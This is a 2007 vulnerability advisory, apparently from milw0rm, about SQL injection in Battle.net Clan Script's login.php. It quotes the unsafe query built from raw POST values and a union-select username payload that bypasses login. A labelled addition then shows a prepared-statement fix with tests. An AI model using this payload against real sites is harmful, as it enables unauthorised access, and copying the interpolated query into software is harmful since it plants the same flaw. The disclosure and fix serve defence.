Information Security

From: h a c k e r _ X <sims.hack_(at)_gmail.com>
Date: April 11, 2007
Subject: Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

****************************************

script : Battle.net Clan Script 1.5
file : login.php
attack : SQL injection

author : h a c k e r _ X

***************************************

code :
------------------------------------------------------------------------------------------

line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];

.....
.....
.....

line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******

------------------------------------------------------------------------------------------


exploit :
*******

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : anything





***************************************************
thanks to : max007, simo64, brutalism and all Moroccan hackers

special thanks to "P Y N S S O"

***************************************************

# milw0rm.com [2007-04-09]
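
A hardened form of the lookup quoted from login.php above, as an added example that is not part of the original advisory or of Battle.net Clan Script. It assumes PDO with the pdo_sqlite driver as an in-memory stand-in for MySQL, a reduced `bcs_members` table holding only the `name` and `password` columns seen in the advisory, passwords stored with `password_hash()`, and a hypothetical function name `bcs_login`.

```php
<?php
// Added example, not the script's own code. Assumptions: pdo_sqlite as an
// in-memory stand-in for MySQL, a reduced bcs_members table, and passwords
// stored with password_hash(). bcs_login() is a hypothetical name.

function bcs_login(PDO $db, string $user, string $pass): bool
{
    // The placeholder keeps $user as data: quotes and comment markers in it
    // cannot change the structure of the statement. Only the column that is
    // needed is selected, instead of SELECT *.
    $stmt = $db->prepare('SELECT password FROM bcs_members WHERE name = :name');
    $stmt->execute([':name' => $user]);
    $hash = $stmt->fetchColumn();

    // No matching row: fail closed.
    if ($hash === false) {
        return false;
    }

    // The password never enters the SQL text; it is checked against the
    // stored hash in PHP.
    return password_verify($pass, $hash);
}

// Constructed test data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so the
// server receives the statement and the values separately.
$db->exec('CREATE TABLE bcs_members (name TEXT PRIMARY KEY, password TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO bcs_members (name, password) VALUES (?, ?)');
$ins->execute(['clanleader', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The Username value from the advisory, passed through unchanged.
$reported = "' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*";

var_dump(bcs_login($db, 'clanleader', 'correct horse')); // valid credentials
var_dump(bcs_login($db, 'clanleader', 'wrong'));         // wrong password
var_dump(bcs_login($db, $reported, 'anything'));         // advisory input
```

Only the first call should log in; the advisory's input is looked up as a literal member name that does not exist.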

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod